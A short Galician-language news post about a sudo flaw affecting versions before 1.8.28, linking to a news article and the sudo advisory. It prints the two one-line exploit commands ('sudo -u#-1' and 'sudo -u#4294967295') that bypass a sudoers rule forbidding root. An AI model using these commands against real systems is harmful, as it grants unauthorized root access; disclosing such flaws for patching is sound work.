Un erro en sudo permítelle executar calquera ficheiro executable como root se /etc/sudoers permite que outros usuarios o executen e está prohibido para root.
A explotación do erro é moi sinxela:
sudo -u#-1 id -u
ou:
sudo -u#4294967295 id -u
O erro está presente en todas as versións de sudo anteriores á 1.8.28
Detalles:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Fonte: linux.org.ru